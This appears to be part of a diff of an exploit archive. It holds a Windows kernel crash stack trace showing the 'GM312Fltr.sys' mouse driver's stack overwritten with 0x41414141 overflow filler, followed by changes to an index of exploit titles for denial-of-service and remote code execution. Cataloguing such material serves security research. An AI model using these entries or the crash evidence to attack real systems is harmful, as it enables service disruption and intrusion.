+fffff807`2e3122f6  00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7  nt!KiBugCheckDebugBreak+0x12
+fffff807`2e1f6df7  fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8  nt!KeBugCheck2+0x946
+fffff807`36bc0e1e  00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd  nt!KeBugCheckEx+0x107
+fffff807`36bc0ea7  fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720  GM312Fltr+0xe1e
+fffff807`2e1ffbaf  fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000  GM312Fltr+0xea7
+fffff807`2e087547  fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d  nt!RtlpExecuteHandlerForException+0xf
+fffff807`2e086136  ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0  nt!RtlDispatchException+0x297
+fffff807`2e1f7b82  00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000  nt!KiDispatchException+0x186
+fffff807`2e1f7b50  fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010  nt!KxExceptionDispatchOnExceptionStack+0x12
+fffff807`2e208da5  00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246  nt!KiExceptionDispatchOnExceptionStackContinue
+fffff807`2e204ae0  ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000  nt!KiExceptionDispatch+0x125
+fffff807`2e1fe0c7  fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710  nt!KiGeneralProtectionFault+0x320
+fffff807`2e1fda76  7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000  nt!SwapContext+0x377
+fffff807`2e00c970  ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498  nt!KiSwapContext+0x76
+fffff807`2e00be9f  ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000  nt!KiSwapThread+0x500
+fffff807`2e00b743  ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0  nt!KiCommitThreadWait+0x14f
+fffff807`36bc0ca2  ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100  nt!KeWaitForSingleObject+0x233
+fffff807`36bc0b5d  ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017  GM312Fltr+0xca2
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  GM312Fltr+0xb5d
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f  0x41414141`41414141
+41414141`41414141  41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0  0x41414141`41414141
+41414141`41414141  41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000  0x41414141`41414141
+41414141`41414141  00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80  0x41414141`41414141
+00000000`0020027f  00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000  0x41414141`41414141
+00000000`5c4eafe0  00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000  0x20027f
+00000000`00000000  0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000  MSVCR90!pow+0x4e0
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6b4e46cf0..7886720c5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5252,6 +5252,7 @@ id,file,description,date,author,type,platform,port
 40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx,
 40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows,
 43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows,
+50311,exploits/windows/dos/50311.py,"Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
 43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows,
 43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows,
 43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows,
@@ -17259,7 +17260,6 @@ id,file,description,date,author,type,platform,port
 35924,exploits/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",1970-01-01,"Jeremy Brown",remote,windows,
 35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",1970-01-01,"Zsolt Imre",remote,hardware,
 35928,exploits/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite",1970-01-01,"High-Tech Bridge SA",remote,windows,
-35932,exploits/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Overflow",1970-01-01,"Nicholas Lemonias",remote,hardware,
 35948,exploits/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",1970-01-01,Rh0,remote,windows,
 35949,exploits/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",1970-01-01,"Paul Craig",remote,windows,
 35961,exploits/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",1970-01-01,"Juttikhun Khamchaiyaphum",remote,hp-ux,
@@ -44426,3 +44426,5 @@ id,file,description,date,author,type,platform,port
 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
 50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,
+50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
+50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,